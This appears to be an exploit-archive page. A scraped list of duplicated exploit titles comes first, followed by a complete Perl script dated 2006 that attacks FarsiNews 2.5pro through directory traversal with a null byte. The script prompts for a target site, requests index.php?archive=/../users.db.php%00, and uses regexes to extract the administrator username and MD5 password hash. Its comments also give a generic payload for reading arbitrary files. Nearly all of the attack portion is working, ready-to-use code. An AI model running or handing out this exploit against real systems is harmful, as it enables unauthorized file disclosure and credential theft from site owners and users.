
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
60 lines
2.6 KiB
Perl
Executable file
60 lines
2.6 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
#
|
|
# FarsiNews 2.5pro Show User&Passowrd
|
|
# Exploit by Hessam-x (www.hessamx.net)
|
|
#
|
|
#
|
|
######################################################
|
|
# ___ ___ __ #
|
|
# / | \_____ ____ | | __ ___________________ #
|
|
#/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / #
|
|
#\ Y // __ \\ \___| <\ ___/| | \// / #
|
|
# \___|_ /(____ /\___ >__|_ \\___ >__| /_____ \ #
|
|
# \/ \/ \/ \/ \/ \/ #
|
|
# Iran Hackerz Security Team #
|
|
# WebSite: www.hackerz.ir #
|
|
# #
|
|
######################################################
|
|
# Description #
|
|
# #
|
|
# Name : FarsiNews [www.farsinewsteam.com] #
|
|
# version : 2.5Pro #
|
|
######################################################
|
|
# in FarsiNews if you change the archive value :
|
|
# http://localhost/index.php?archive=hamid
|
|
# see :
|
|
# Warning: file([PATH]/data/archives/hamid.news.arch.php):
|
|
# failed to open stream: No such file or directory in [PATH]\inc\shows.inc.php on line 642
|
|
# Warning: file([PATH]/data/archives/hamid.comments.arch.php):
|
|
# failed to open stream: No such file or directory in [PATH]\inc\shows.inc.php on line 686
|
|
# ...[and many other error]
|
|
# it means that shows.inc.php try to open '/archives/hamid.news.arch.php' (and also 'hamid.comments.arch.php') to read it's data .
|
|
# we can change the archive value to '/../users.db.php%00' to see all username and password .
|
|
# Exploit :
|
|
# http://localhost/index.php?archive=/../users.db.php%00
|
|
# http://localhost/Farsi1/index.php?archive=/../[file-to-read]%00
|
|
# F0und by hamid
|
|
use LWP::Simple;
|
|
|
|
print "-------------------------------------------\n";
|
|
print "= Farsinews 2.5Pro =\n";
|
|
print "= By Hessam-x - www.hackerz.ir =\n";
|
|
print "-------------------------------------------\n\n";
|
|
|
|
|
|
print "Target(www.example.com)\> ";
|
|
chomp($targ = <STDIN>);
|
|
|
|
print "Path: (/fn25/)\>";
|
|
chomp($path=<STDIN>);
|
|
|
|
$url = "index.php?archive=/../users.db.php%00";
|
|
$page = get("http://".$targ.$path.$url) || die "[-] Unable to retrieve: $!";
|
|
print "[+] Connected to: $targ\n";
|
|
|
|
$page =~ m/<img alt="(.*?)" src=/ && print "[+] Username:\n $1\n";
|
|
$page =~ m/style="border: none;" align="right" \/>(.*?)<\/font>/ && print "[+] MD5 Password:\n $1\n";
|
|
|
|
print "[-] Unable to retrieve User ID\n" if(!$1);
|
|
|
|
# milw0rm.com [2006-02-28]
|